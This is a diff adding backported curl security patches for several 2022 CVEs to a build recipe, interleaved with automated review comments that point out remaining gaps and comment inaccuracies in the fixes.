+ }
+
+ if(SSL_SET_OPTION(cert)) {
+diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
+index a14cecc..ec5a8f5 100644
+--- a/lib/vtls/openssl.c
++++ b/lib/vtls/openssl.c
+@@ -2454,14 +2454,14 @@ static CURLcode ossl_connect_step1(struct connectdata *conn, int sockindex)
+ &data->set.proxy_ssl.certverifyresult : &data->set.ssl.certverifyresult;
+ const long int ssl_version = SSL_CONN_CONFIG(version);
+ #ifdef USE_TLS_SRP
+- const enum CURL_TLSAUTH ssl_authtype = SSL_SET_OPTION(authtype);
++ const enum CURL_TLSAUTH ssl_authtype = SSL_SET_OPTION(primary.authtype);
+ #endif
+ char * const ssl_cert = SSL_SET_OPTION(cert);
+ const char * const ssl_cert_type = SSL_SET_OPTION(cert_type);
+ const char * const ssl_cafile = SSL_CONN_CONFIG(CAfile);
+ const char * const ssl_capath = SSL_CONN_CONFIG(CApath);
+ const bool verifypeer = SSL_CONN_CONFIG(verifypeer);
+- const char * const ssl_crlfile = SSL_SET_OPTION(CRLfile);
++ const char * const ssl_crlfile = SSL_SET_OPTION(primary.CRLfile);
+ char error_buffer[256];
+
+ DEBUGASSERT(ssl_connect_1 == connssl->connecting_state);
+@@ -2741,15 +2741,15 @@ static CURLcode ossl_connect_step1(struct connectdata *conn, int sockindex)
+ #ifdef USE_TLS_SRP
+ if((ssl_authtype == CURL_TLSAUTH_SRP) &&
+ Curl_allow_auth_to_host(data)) {
+- char * const ssl_username = SSL_SET_OPTION(username);
+-
++ char * const ssl_username = SSL_SET_OPTION(primary.username);
++ char * const ssl_password = SSL_SET_OPTION(primary.password);
+ infof(data, "Using TLS-SRP username: %s\n", ssl_username);
+
+ if(!SSL_CTX_set_srp_username(BACKEND->ctx, ssl_username)) {
+ failf(data, "Unable to set SRP user name");
+ return CURLE_BAD_FUNCTION_ARGUMENT;
+ }
+- if(!SSL_CTX_set_srp_password(BACKEND->ctx, SSL_SET_OPTION(password))) {
++ if(!SSL_CTX_set_srp_password(BACKEND->ctx, ssl_password)) {
+ failf(data, "failed setting SRP password");
+ return CURLE_BAD_FUNCTION_ARGUMENT;
+ }
+diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
+index e38f74e..e8cb70f 100644
+--- a/lib/vtls/vtls.c
++++ b/lib/vtls/vtls.c
+@@ -89,6 +89,7 @@ Curl_ssl_config_matches(struct ssl_primary_config* data,
+ {
+ if((data->version == needle->version) &&
+ (data->version_max == needle->version_max) &&
++ (data->ssl_options == needle->ssl_options) &&
+ (data->verifypeer == needle->verifypeer) &&
+ (data->verifyhost == needle->verifyhost) &&
+ (data->verifystatus == needle->verifystatus) &&
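Review bot: The members moved into `struct ssl_primary_config` (`CRLfile`, `username`, `password`, `authtype`) are not added to the comparison in `Curl_ssl_config_matches()`: the diffstat gives `lib/vtls/vtls.c` a single inserted line, and that line compares only `ssl_options`. As the patch stands, two transfers that differ only in TLS-SRP credentials or CRL file would still be treated as matching for connection reuse. Unless `Curl_clone_primary_ssl_config()` and its free counterpart already handle them elsewhere, the new members (including `ssl_options`) are also never copied into the per-connection config that is compared. Extend the comparison as sketched below and mirror the members in the clone and free helpers. The body of Curl_ssl_config_matches continues outside the hunk.

```c
/* … unchanged: version, ssl_options and verify* comparisons … */
#ifdef USE_TLS_SRP
     Curl_safecmp(data->username, needle->username) &&
     Curl_safecmp(data->password, needle->password) &&
     (data->authtype == needle->authtype) &&
#endif
     Curl_safecmp(data->CRLfile, needle->CRLfile) &&
/* … unchanged: remaining comparisons in Curl_ssl_config_matches … */
```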
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27782-2.patch b/meta/recipes-support/curl/curl/CVE-2022-27782-2.patch
new file mode 100644
index 0000000000..3d56025210
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27782-2.patch
@@ -0,0 +1,71 @@
+From 0a115a8903dffc7f723d1d4d71fb821d69eb8761 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 9 May 2022 23:13:53 +0200
+Subject: [PATCH] url: check SSH config match on connection reuse
+
+CVE-2022-27782
+
+Reported-by: Harry Sintonen
+Bug: https://curl.se/docs/CVE-2022-27782.html
+Closes #8825
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/1645e9b44505abd5cbaf65da5282c3f33b5924a5]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/url.c | 11 +++++++++++
+ lib/vssh/ssh.h | 6 +++---
+ 2 files changed, 14 insertions(+), 3 deletions(-)
+
+diff --git a/lib/url.c b/lib/url.c
+index 6518be9..8da0245 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -1027,6 +1027,12 @@ static void prune_dead_connections(struct Curl_easy *data)
+ }
+ }
+
++static bool ssh_config_matches(struct connectdata *one,
++ struct connectdata *two)
++{
++ return (Curl_safecmp(one->proto.sshc.rsa, two->proto.sshc.rsa) &&
++ Curl_safecmp(one->proto.sshc.rsa_pub, two->proto.sshc.rsa_pub));
++}
+ /*
+ * Given one filled in connection struct (named needle), this function should
+ * detect if there already is one that has all the significant details
+@@ -1260,6 +1266,11 @@ ConnectionExists(struct Curl_easy *data,
+ }
+ }
+
++ if(get_protocol_family(needle->handler->protocol) == PROTO_FAMILY_SSH) {
++ if(!ssh_config_matches(needle, check))
++ continue;
++ }
++
+ if(!needle->bits.httpproxy || (needle->handler->flags&PROTOPT_SSL) ||
+ needle->bits.tunnel_proxy) {
+ /* The requested connection does not use a HTTP proxy or it uses SSL or
+diff --git a/lib/vssh/ssh.h b/lib/vssh/ssh.h
+index 0d4ee52..8f2632e 100644
+--- a/lib/vssh/ssh.h
++++ b/lib/vssh/ssh.h
+@@ -7,7 +7,7 @@
+ * | (__| |_| | _ <| |___
+ * \___|\___/|_| \_\_____|
+ *
+- * Copyright (C) 1998 - 2020, Daniel Stenberg, <daniel@haxx.se>, et al.
++ * Copyright (C) 1998 - 2022, Daniel Stenberg, <daniel@haxx.se>, et al.
+ *
+ * This software is licensed as described in the file COPYING, which
+ * you should have received as part of this distribution. The terms
+@@ -120,8 +120,8 @@ struct ssh_conn {
+
+ /* common */
+ const char *passphrase; /* pass-phrase to use */
+- char *rsa_pub; /* path name */
+- char *rsa; /* path name */
++ char *rsa_pub; /* strdup'ed public key file */
++ char *rsa; /* strdup'ed private key file */
+ bool authed; /* the connection has been authenticated fine */
+ sshstate state; /* always use ssh.c:state() to change state! */
+ sshstate nextstate; /* the state to goto after stopping */
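Review bot: `ssh_config_matches()` is added without a comment and runs straight into the block comment that follows it. A short header such as `/* ssh_config_matches() tells if two SSH connections were set up with the same private and public key files */`, plus a blank line after the closing brace, would make the reuse rule explicit. It compares the stored file names (`rsa`, `rsa_pub`) rather than key contents, and it reads `proto.sshc`, so it is only meaningful when both connections are SSH. The call site tests `needle` only; whether `check` is already known to use the same handler is decided outside the hunk.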
diff --git a/meta/recipes-support/curl/curl/CVE-2022-32206.patch b/meta/recipes-support/curl/curl/CVE-2022-32206.patch
new file mode 100644
index 0000000000..3d76aeb43d
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-32206.patch
@@ -0,0 +1,52 @@
+From 25e7be39be5f8ed696b6085ced9cf6c17e6128f4 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 16 May 2022 16:28:13 +0200
+Subject: [PATCH] content_encoding: return error on too many compression steps
+
+The max allowed steps is arbitrarily set to 5.
+
+Bug: https://curl.se/docs/CVE-2022-32206.html
+CVE-2022-32206
+Reported-by: Harry Sintonen
+Closes #9049
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/3a09fbb7f264c67c43]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/content_encoding.c | 9 +++++++++
+ 1 file changed, 9 insertions(+)
+
+diff --git a/lib/content_encoding.c b/lib/content_encoding.c
+index 6d47537..91e621f 100644
+--- a/lib/content_encoding.c
++++ b/lib/content_encoding.c
+@@ -934,6 +934,9 @@ static const content_encoding *find_encoding(const char *name, size_t len)
+ return NULL;
+ }
+
++/* allow no more than 5 "chained" compression steps */
++#define MAX_ENCODE_STACK 5
++
+ /* Set-up the unencoding stack from the Content-Encoding header value.
+ * See RFC 7231 section 3.1.2.2. */
+ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
+@@ -941,6 +944,7 @@ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
+ {
+ struct Curl_easy *data = conn->data;
+ struct SingleRequest *k = &data->req;
++ int counter = 0;
+
+ do {
+ const char *name;
+@@ -975,6 +979,11 @@ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
+ if(!encoding)
+ encoding = &error_encoding; /* Defer error at stack use. */
+
++ if(++counter >= MAX_ENCODE_STACK) {
++ failf(data, "Reject response due to %u content encodings",
++ counter);
++ return CURLE_BAD_CONTENT_ENCODING;
++ }
+ /* Stack the unencoding stage. */
+ writer = new_unencoding_writer(conn, encoding, k->writer_stack);
+ if(!writer)
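Review bot: `counter` is a local initialised to 0 on every call of `Curl_build_unencoding_stack()`, so the `MAX_ENCODE_STACK` limit applies to one header value rather than to the whole response. If the function is invoked once per Content-Encoding or Transfer-Encoding header (the callers are outside the hunk), the decoder stack built across several headers is not bounded by this check; keeping the depth in the request state next to `k->writer_stack` would bound the total. Separately, `++counter >= MAX_ENCODE_STACK` rejects the fifth step while the comment says no more than 5 are allowed, and `counter` is an `int` printed with `%u`.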
diff --git a/meta/recipes-support/curl/curl/CVE-2022-32207.patch b/meta/recipes-support/curl/curl/CVE-2022-32207.patch
new file mode 100644
index 0000000000..f75aaecd64
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-32207.patch
@@ -0,0 +1,284 @@
+From af92181055d7d64dfc0bc9d5a13c8b98af3196be Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Wed, 25 May 2022 10:09:53 +0200
+Subject: [PATCH] fopen: add Curl_fopen() for better overwriting of files
+
+Bug: https://curl.se/docs/CVE-2022-32207.html
+CVE-2022-32207
+Reported-by: Harry Sintonen
+Closes #9050
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/20f9dd6bae50b]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ CMakeLists.txt | 1 +
+ configure.ac | 1 +
+ lib/Makefile.inc | 4 +-
+ lib/cookie.c | 19 ++-----
+ lib/curl_config.h.cmake | 3 ++
+ lib/fopen.c | 113 ++++++++++++++++++++++++++++++++++++++++
+ lib/fopen.h | 30 +++++++++++
+ 7 files changed, 155 insertions(+), 16 deletions(-)
+ create mode 100644 lib/fopen.c
+ create mode 100644 lib/fopen.h
+
+diff --git a/CMakeLists.txt b/CMakeLists.txt
+index 73b053b..cc587b0 100644
+--- a/CMakeLists.txt
++++ b/CMakeLists.txt
+@@ -869,6 +869,7 @@ elseif(HAVE_LIBSOCKET)
+ set(CMAKE_REQUIRED_LIBRARIES socket)
+ endif()
+
++check_symbol_exists(fchmod "${CURL_INCLUDES}" HAVE_FCHMOD)
+ check_symbol_exists(basename "${CURL_INCLUDES}" HAVE_BASENAME)
+ check_symbol_exists(socket "${CURL_INCLUDES}" HAVE_SOCKET)
+ check_symbol_exists(select "${CURL_INCLUDES}" HAVE_SELECT)
+diff --git a/configure.ac b/configure.ac
+index d090622..7071077 100755
+--- a/configure.ac
++++ b/configure.ac
+@@ -4059,6 +4059,7 @@ AC_CHECK_DECLS([getpwuid_r], [], [AC_DEFINE(HAVE_DECL_GETPWUID_R_MISSING, 1, "Se
+
+
+ AC_CHECK_FUNCS([fnmatch \
++ fchmod \
+ geteuid \
+ getpass_r \
+ getppid \
+diff --git a/lib/Makefile.inc b/lib/Makefile.inc
+index 46ded90..79307d8 100644
+--- a/lib/Makefile.inc
++++ b/lib/Makefile.inc
+@@ -63,7 +63,7 @@ LIB_CFILES = file.c timeval.c base64.c hostip.c progress.c formdata.c \
+ curl_multibyte.c hostcheck.c conncache.c dotdot.c \
+ x509asn1.c http2.c smb.c curl_endian.c curl_des.c system_win32.c \
+ mime.c sha256.c setopt.c curl_path.c curl_ctype.c curl_range.c psl.c \
+- doh.c urlapi.c curl_get_line.c altsvc.c socketpair.c rename.c
++ doh.c urlapi.c curl_get_line.c altsvc.c socketpair.c rename.c fopen.c
+
+ LIB_HFILES = arpa_telnet.h netrc.h file.h timeval.h hostip.h progress.h \
+ formdata.h cookie.h http.h sendf.h ftp.h url.h dict.h if2ip.h \
+@@ -84,7 +84,7 @@ LIB_HFILES = arpa_telnet.h netrc.h file.h timeval.h hostip.h progress.h \
+ x509asn1.h http2.h sigpipe.h smb.h curl_endian.h curl_des.h \
+ curl_printf.h system_win32.h rand.h mime.h curl_sha256.h setopt.h \
+ curl_path.h curl_ctype.h curl_range.h psl.h doh.h urlapi-int.h \
+- curl_get_line.h altsvc.h quic.h socketpair.h rename.h
++ curl_get_line.h altsvc.h quic.h socketpair.h rename.h fopen.h
+
+ LIB_RCFILES = libcurl.rc
+
+diff --git a/lib/cookie.c b/lib/cookie.c
+index 68054e1..a9ad20a 100644
+--- a/lib/cookie.c
++++ b/lib/cookie.c
+@@ -97,8 +97,8 @@ Example set of cookies:
+ #include "curl_memrchr.h"
+ #include "inet_pton.h"
+ #include "parsedate.h"
+-#include "rand.h"
+ #include "rename.h"
++#include "fopen.h"
+
+ /* The last 3 #include files should be in this order */
+ #include "curl_printf.h"
+@@ -1524,18 +1524,9 @@ static int cookie_output(struct Curl_easy *data,
+ use_stdout = TRUE;
+ }
+ else {
+- unsigned char randsuffix[9];
+-
+- if(Curl_rand_hex(data, randsuffix, sizeof(randsuffix)))
+- return 2;
+-
+- tempstore = aprintf("%s.%s.tmp", filename, randsuffix);
+- if(!tempstore)
+- return 1;
+-
+- out = fopen(tempstore, FOPEN_WRITETEXT);
+- if(!out)
+- goto error;
++ error = Curl_fopen(data, filename, &out, &tempstore);
++ if(error)
++ goto error;
+ }
+
+ fputs("# Netscape HTTP Cookie File\n"
+@@ -1581,7 +1572,7 @@ static int cookie_output(struct Curl_easy *data,
+ if(!use_stdout) {
+ fclose(out);
+ out = NULL;
+- if(Curl_rename(tempstore, filename)) {
++ if(tempstore && Curl_rename(tempstore, filename)) {
+ unlink(tempstore);
+ goto error;
+ }
+diff --git a/lib/curl_config.h.cmake b/lib/curl_config.h.cmake
+index 98cdf51..fe43751 100644
+--- a/lib/curl_config.h.cmake
++++ b/lib/curl_config.h.cmake
+@@ -124,6 +124,9 @@
+ /* Define to 1 if you have the <assert.h> header file. */
+ #cmakedefine HAVE_ASSERT_H 1
+
++/* Define to 1 if you have the `fchmod' function. */
++#cmakedefine HAVE_FCHMOD 1
++
+ /* Define to 1 if you have the `basename' function. */
+ #cmakedefine HAVE_BASENAME 1
+
+diff --git a/lib/fopen.c b/lib/fopen.c
+new file mode 100644
+index 0000000..ad3691b
+--- /dev/null
++++ b/lib/fopen.c
+@@ -0,0 +1,113 @@
++/***************************************************************************
++ * _ _ ____ _
++ * Project ___| | | | _ \| |
++ * / __| | | | |_) | |
++ * | (__| |_| | _ <| |___
++ * \___|\___/|_| \_\_____|
++ *
++ * Copyright (C) 1998 - 2022, Daniel Stenberg, <daniel@haxx.se>, et al.
++ *
++ * This software is licensed as described in the file COPYING, which
++ * you should have received as part of this distribution. The terms
++ * are also available at https://curl.se/docs/copyright.html.
++ *
++ * You may opt to use, copy, modify, merge, publish, distribute and/or sell
++ * copies of the Software, and permit persons to whom the Software is
++ * furnished to do so, under the terms of the COPYING file.
++ *
++ * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
++ * KIND, either express or implied.
++ *
++ * SPDX-License-Identifier: curl
++ *
++ ***************************************************************************/
++
++#include "curl_setup.h"
++
++#if !defined(CURL_DISABLE_COOKIES) || !defined(CURL_DISABLE_ALTSVC) || \
++ !defined(CURL_DISABLE_HSTS)
++
++#ifdef HAVE_FCNTL_H
++#include <fcntl.h>
++#endif
++
++#include "urldata.h"
++#include "rand.h"
++#include "fopen.h"
++/* The last 3 #include files should be in this order */
++#include "curl_printf.h"
++#include "curl_memory.h"
++#include "memdebug.h"
++
++/*
++ * Curl_fopen() opens a file for writing with a temp name, to be renamed
++ * to the final name when completed. If there is an existing file using this
++ * name at the time of the open, this function will clone the mode from that
++ * file. if 'tempname' is non-NULL, it needs a rename after the file is
++ * written.
++ */
++CURLcode Curl_fopen(struct Curl_easy *data, const char *filename,
++ FILE **fh, char **tempname)
++{
++ CURLcode result = CURLE_WRITE_ERROR;
++ unsigned char randsuffix[9];
++ char *tempstore = NULL;
++ struct_stat sb;
++ int fd = -1;
++ *tempname = NULL;
++
++ if(stat(filename, &sb) == -1 || !S_ISREG(sb.st_mode)) {
++ /* a non-regular file, fallback to direct fopen() */
++ *fh = fopen(filename, FOPEN_WRITETEXT);
++ if(*fh)
++ return CURLE_OK;
++ goto fail;
++ }
++
++ result = Curl_rand_hex(data, randsuffix, sizeof(randsuffix));
++ if(result)
++ goto fail;
++
++ tempstore = aprintf("%s.%s.tmp", filename, randsuffix);
++ if(!tempstore) {
++ result = CURLE_OUT_OF_MEMORY;
++ goto fail;
++ }
++
++ result = CURLE_WRITE_ERROR;
++ fd = open(tempstore, O_WRONLY | O_CREAT | O_EXCL, 0600);
++ if(fd == -1)
++ goto fail;
++
++#ifdef HAVE_FCHMOD
++ {
++ struct_stat nsb;
++ if((fstat(fd, &nsb) != -1) &&
++ (nsb.st_uid == sb.st_uid) && (nsb.st_gid == sb.st_gid)) {
++ /* if the user and group are the same, clone the original mode */
++ if(fchmod(fd, sb.st_mode) == -1)
++ goto fail;
++ }
++ }
++#endif
++
++ *fh = fdopen(fd, FOPEN_WRITETEXT);
++ if(!*fh)
++ goto fail;
++
++ *tempname = tempstore;
++ return CURLE_OK;
++
++fail:
++ if(fd != -1) {
++ close(fd);
++ unlink(tempstore);
++ }
++
++ free(tempstore);
++
++ *tempname = NULL;
++ return result;
++}
++
++#endif /* ! disabled */
+diff --git a/lib/fopen.h b/lib/fopen.h
+new file mode 100644
+index 0000000..289e55f
+--- /dev/null
++++ b/lib/fopen.h
+@@ -0,0 +1,30 @@
++#ifndef HEADER_CURL_FOPEN_H
++#define HEADER_CURL_FOPEN_H
++/***************************************************************************
++ * _ _ ____ _
++ * Project ___| | | | _ \| |
++ * / __| | | | |_) | |
++ * | (__| |_| | _ <| |___
++ * \___|\___/|_| \_\_____|
++ *
++ * Copyright (C) 1998 - 2022, Daniel Stenberg, <daniel@haxx.se>, et al.
++ *
++ * This software is licensed as described in the file COPYING, which
++ * you should have received as part of this distribution. The terms
++ * are also available at https://curl.se/docs/copyright.html.
++ *
++ * You may opt to use, copy, modify, merge, publish, distribute and/or sell
++ * copies of the Software, and permit persons to whom the Software is
++ * furnished to do so, under the terms of the COPYING file.
++ *
++ * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
++ * KIND, either express or implied.
++ *
++ * SPDX-License-Identifier: curl
++ *
++ ***************************************************************************/
++
++CURLcode Curl_fopen(struct Curl_easy *data, const char *filename,
++ FILE **fh, char **tempname);
++
++#endif
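Review bot: In `Curl_fopen()` (lib/fopen.c) the comment `/* a non-regular file, fallback to direct fopen() */` describes only half of the branch, because the same path is taken when `stat()` fails, which includes the case where `filename` does not exist yet. On that path the file is created by plain `fopen()`, so the exclusive-create temp file and the `0600` create mode used further down do not apply and the resulting permissions are left to the process umask. I would reword the comment to `/* stat() failed (e.g. no such file) or not a regular file: plain fopen(), no temp file, mode left to the umask */`, so that callers writing cookie or other session state do not assume a restrictive mode on first write.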
diff --git a/meta/recipes-support/curl/curl/CVE-2022-32208.patch b/meta/recipes-support/curl/curl/CVE-2022-32208.patch
new file mode 100644
index 0000000000..2939314d09
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-32208.patch
@@ -0,0 +1,72 @@
+From 3b90f0b2a7a84645acce151c86b40d25b5de6615 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 9 Jun 2022 09:27:24 +0200
+Subject: [PATCH] krb5: return error properly on decode errors
+
+Bug: https://curl.se/docs/CVE-2022-32208.html
+CVE-2022-32208
+Reported-by: Harry Sintonen
+Closes #9051
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/6ecdf5136b52af7]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/krb5.c | 5 +----
+ lib/security.c | 13 ++++++++++---
+ 2 files changed, 11 insertions(+), 7 deletions(-)
+
+diff --git a/lib/krb5.c b/lib/krb5.c
+index f50287a..5b77e35 100644
+--- a/lib/krb5.c
++++ b/lib/krb5.c
+@@ -86,11 +86,8 @@ krb5_decode(void *app_data, void *buf, int len,
+ enc.value = buf;
+ enc.length = len;
+ maj = gss_unwrap(&min, *context, &enc, &dec, NULL, NULL);
+- if(maj != GSS_S_COMPLETE) {
+- if(len >= 4)
+- strcpy(buf, "599 ");
++ if(maj != GSS_S_COMPLETE)
+ return -1;
+- }
+
+ memcpy(buf, dec.value, dec.length);
+ len = curlx_uztosi(dec.length);
+diff --git a/lib/security.c b/lib/security.c
+index fbfa707..3542210 100644
+--- a/lib/security.c
++++ b/lib/security.c
+@@ -192,6 +192,7 @@ static CURLcode read_data(struct connectdata *conn,
+ {
+ int len;
+ CURLcode result;
++ int nread;
+
+ result = socket_read(fd, &len, sizeof(len));
+ if(result)
+@@ -200,7 +201,10 @@ static CURLcode read_data(struct connectdata *conn,
+ if(len) {
+ /* only realloc if there was a length */
+ len = ntohl(len);
+- buf->data = Curl_saferealloc(buf->data, len);
++ if(len > CURL_MAX_INPUT_LENGTH)
++ len = 0;
++ else
++ buf->data = Curl_saferealloc(buf->data, len);
+ }
+ if(!len || !buf->data)
+ return CURLE_OUT_OF_MEMORY;
+@@ -208,8 +212,11 @@ static CURLcode read_data(struct connectdata *conn,
+ result = socket_read(fd, buf->data, len);
+ if(result)
+ return result;
+- buf->size = conn->mech->decode(conn->app_data, buf->data, len,
+- conn->data_prot, conn);
++ nread = buf->size = conn->mech->decode(conn->app_data, buf->data, len,
++ conn->data_prot, conn);
++ if(nread < 0)
++ return CURLE_RECV_ERROR;
++ buf->size = (size_t)nread;
+ buf->index = 0;
+ return CURLE_OK;
+ }
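Review bot: In `read_data()` (lib/security.c) the chained assignment `nread = buf->size = conn->mech->decode(...)` stores the decoder's return value in `buf->size` before the `nread < 0` check runs. If `buf->size` is unsigned (the `(size_t)nread` cast two lines later suggests it is), a `-1` from `krb5_decode()` passes through an unsigned type on its way to `nread` and is left in `buf->size` as a very large length when the function returns `CURLE_RECV_ERROR`. Assign to `nread` only, `nread = conn->mech->decode(conn->app_data, buf->data, len, conn->data_prot, conn);`, and leave `buf->size = (size_t)nread;` after the check as the single write. `read_data()` starts before this hunk.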
diff --git a/meta/recipes-support/curl/curl/CVE-2022-32221.patch b/meta/recipes-support/curl/curl/CVE-2022-32221.patch
new file mode 100644
index 0000000000..8e662abd3a
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-32221.patch
@@ -0,0 +1,29 @@
+From 75c04a3e75e8e3025a17ca3033ca307da9691cd0 Mon Sep 17 00:00:00 2001
+From: Vivek Kumbhar <vkumbhar@mvista.com>
+Date: Fri, 11 Nov 2022 10:49:58 +0530
+Subject: [PATCH] CVE-2022-32221
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/a64e3e59938abd7d6]
+CVE: CVE-2022-32221
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+
+setopt: when POST is set, reset the 'upload' field.
+---
+ lib/setopt.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/lib/setopt.c b/lib/setopt.c
+index bebb2e4..4d96f6b 100644
+--- a/lib/setopt.c
++++ b/lib/setopt.c
+@@ -486,6 +486,7 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
+ }
+ else
+ data->set.httpreq = HTTPREQ_GET;
++ data->set.upload = FALSE;
+ break;
+
+ case CURLOPT_COPYPOSTFIELDS:
+--
+2.25.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2022-35252.patch b/meta/recipes-support/curl/curl/CVE-2022-35252.patch
new file mode 100644
index 0000000000..a5160c01f4
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-35252.patch
@@ -0,0 +1,72 @@
+From c9212bdb21f0cc90a1a60dfdbb716deefe78fd40 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 29 Aug 2022 00:09:17 +0200
+Subject: [PATCH] cookie: reject cookies with "control bytes"
+
+Rejects 0x01 - 0x1f (except 0x09) plus 0x7f
+
+Reported-by: Axel Chong
+
+Bug: https://curl.se/docs/CVE-2022-35252.html
+
+CVE-2022-35252
+
+Closes #9381
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/8dfc93e573ca740544a2d79ebb]
+
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/cookie.c | 29 +++++++++++++++++++++++++++++
+ 1 file changed, 29 insertions(+)
+
+diff --git a/lib/cookie.c b/lib/cookie.c
+index a9ad20a..66c7715 100644
+--- a/lib/cookie.c
++++ b/lib/cookie.c
+@@ -412,6 +412,30 @@ static bool bad_domain(const char *domain)
+ return !strchr(domain, '.') && !strcasecompare(domain, "localhost");
+ }
+
++/*
++ RFC 6265 section 4.1.1 says a server should accept this range:
++
++ cookie-octet = %x21 / %x23-2B / %x2D-3A / %x3C-5B / %x5D-7E
++
++ But Firefox and Chrome as of June 2022 accept space, comma and double-quotes
++ fine. The prime reason for filtering out control bytes is that some HTTP
++ servers return 400 for requests that contain such.
++*/
++static int invalid_octets(const char *p)
++{
++ /* Reject all bytes \x01 - \x1f (*except* \x09, TAB) + \x7f */
++ static const char badoctets[] = {
++ "\x01\x02\x03\x04\x05\x06\x07\x08\x0a"
++ "\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14"
++ "\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x7f"
++ };
++ size_t vlen, len;
++ /* scan for all the octets that are *not* in cookie-octet */
++ len = strcspn(p, badoctets);
++ vlen = strlen(p);
++ return (len != vlen);
++}
++
+ /****************************************************************************
+ *
+ * Curl_cookie_add()
+@@ -558,6 +582,11 @@ Curl_cookie_add(struct Curl_easy *data,
+ badcookie = TRUE;
+ break;
+ }
++ if(invalid_octets(whatptr) || invalid_octets(name)) {
++ infof(data, "invalid octets in name/value, cookie dropped");
++ badcookie = TRUE;
++ break;
++ }
+ }
+ else if(!len) {
+ /* this was a "<name>=" with no content, and we must allow
+--
+2.35.1
+
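Review bot: The inline comment in `invalid_octets()`, `/* scan for all the octets that are *not* in cookie-octet */`, overstates what the function checks. `badoctets` lists only 0x01-0x1f (minus TAB) and 0x7f, so space, comma, double quote and bytes of 0x80 and above are still accepted although they fall outside the RFC 6265 `cookie-octet` range quoted in the header comment. I would change it to `/* find the first control octet listed in badoctets, if any */` so nobody later treats this helper as a full RFC validity check. The call site in `Curl_cookie_add()` covers only the name and value, and that function continues outside the hunk.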
diff --git a/meta/recipes-support/curl/curl/CVE-2022-35260.patch b/meta/recipes-support/curl/curl/CVE-2022-35260.patch
new file mode 100644
index 0000000000..476c996b0a
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-35260.patch
@@ -0,0 +1,68 @@
+From 3ff3989ec53d9ddcf4bdd99f5d5788dd87486768 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Tue, 4 Oct 2022 14:37:24 +0200
+Subject: [PATCH] netrc: replace fgets with Curl_get_line
+
+Upstream-Status: Backport
+CVE: CVE-2022-35260
+Reference to upstream patch: https://github.com/curl/curl/commit/c97ec984fb2bc919a3aa863e0476dffa377b184c
+
+Make the parser only accept complete lines and avoid problems with
+overly long lines.
+
+Reported-by: Hiroki Kurosawa
+
+Closes #9789
+---
+ lib/curl_get_line.c | 4 ++--
+ lib/netrc.c | 5 +++--
+ 2 files changed, 5 insertions(+), 4 deletions(-)
+
+diff --git a/lib/curl_get_line.c b/lib/curl_get_line.c
+index c4194851ae09..4b9eea9e631c 100644
+--- a/lib/curl_get_line.c
++++ b/lib/curl_get_line.c
+@@ -28,8 +28,8 @@
+ #include "memdebug.h"
+
+ /*
+- * get_line() makes sure to only return complete whole lines that fit in 'len'
+- * bytes and end with a newline.
++ * Curl_get_line() makes sure to only return complete whole lines that fit in
++ * 'len' bytes and end with a newline.
+ */
+ char *Curl_get_line(char *buf, int len, FILE *input)
+ {
+diff --git a/lib/netrc.c b/lib/netrc.c
+index 1c9da31993c9..93239132c9d8 100644
+--- a/lib/netrc.c
++++ b/lib/netrc.c
+@@ -31,6 +31,7 @@
+ #include "netrc.h"
+ #include "strtok.h"
+ #include "strcase.h"
++#include "curl_get_line.h"
+
+ /* The last 3 #include files should be in this order */
+ #include "curl_printf.h"
+@@ -83,7 +84,7 @@ static int parsenetrc(const char *host,
+ char netrcbuffer[4096];
+ int netrcbuffsize = (int)sizeof(netrcbuffer);
+
+- while(!done && fgets(netrcbuffer, netrcbuffsize, file)) {
++ while(!done && Curl_get_line(netrcbuffer, netrcbuffsize, file)) {
+ tok = strtok_r(netrcbuffer, " \t\n", &tok_buf);
+ if(tok && *tok == '#')
+ /* treat an initial hash as a comment line */
+@@ -169,7 +170,7 @@ static int parsenetrc(const char *host,
+
+ tok = strtok_r(NULL, " \t\n", &tok_buf);
+ } /* while(tok) */
+- } /* while fgets() */
++ } /* while Curl_get_line() */
+
+ out:
+ if(!retcode) {
